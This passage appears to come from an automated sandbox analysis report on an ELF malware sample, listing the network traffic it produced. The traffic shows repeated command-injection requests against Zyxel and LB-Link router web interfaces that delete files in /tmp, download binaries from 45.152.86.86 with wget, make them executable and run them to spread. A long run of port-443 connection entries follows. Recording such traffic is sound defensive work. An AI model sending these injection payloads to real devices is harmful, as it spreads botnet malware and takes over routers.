      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: unknownDNS traffic detected: queries for: a.iruko.top
      Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 689X-Iinfo: 12-92977526-0 0NNN RT(1711869702474 47) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 32 2d 39 32 39 37 37 35 32 36 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 31 31 38 36 39 37 30 32 34 37 34 25 32 30 34 37 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 34 34 38 30 38 35 33 36 35 32 35 36 38 38 35 38 33 36 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 34 34 38 30 38 35 33 36 35 32 35 36 38 38 35 38 33 36 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=12-92977526-0%200NNN%20RT%281711869702474%2047%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-448085365256885836&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-448085365256885836</iframe></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 10607836643525915385Connection: closeServer: Lego ServerDate: Sun, 31 Mar 2024 07:22:48 GMTX-Cache-Lookup: Return DirectlyX-ServerIp: 112.48.217.7Client-Ip: 102.165.48.43
      Source: QvyiI8SFTm.elfString found in binary or memory: http://45.152.86.86/mips;$
      Source: QvyiI8SFTm.elfString found in binary or memory: http://45.152.86.86/mpsl;
      Source: unknownNetwork traffic detected: HTTP traffic on port 39890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40408 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48366 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48378 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38552 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37238 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34190 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37214 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39420 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35070 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42602 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59494 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38564 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37684 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58144 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39500
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39502
      Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
      Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
      Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
      Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
      Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59482 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
      Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
      Source: unknownNetwork traffic detected: HTTP traffic on port 52898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46148 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58156 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38540 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51500 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52516
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
      Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52518
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
      Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39540
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39542
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52512
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
      Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39468 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
      Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39546
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39538
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40526
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40524
      Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40528
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
      Source: unknownNetwork traffic detected: HTTP traffic on port 47090 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
      Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40522
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52528
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52526
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
      Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39530
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39532
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39534
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52524
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52522
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
      Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40516
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39526
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40514
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39528
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40518
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40512
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40510
      Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52538
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52536
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
      Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
      Source: unknownNetwork traffic detected: HTTP traffic on port 47474 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39520
      Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52534
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39522
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
      Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
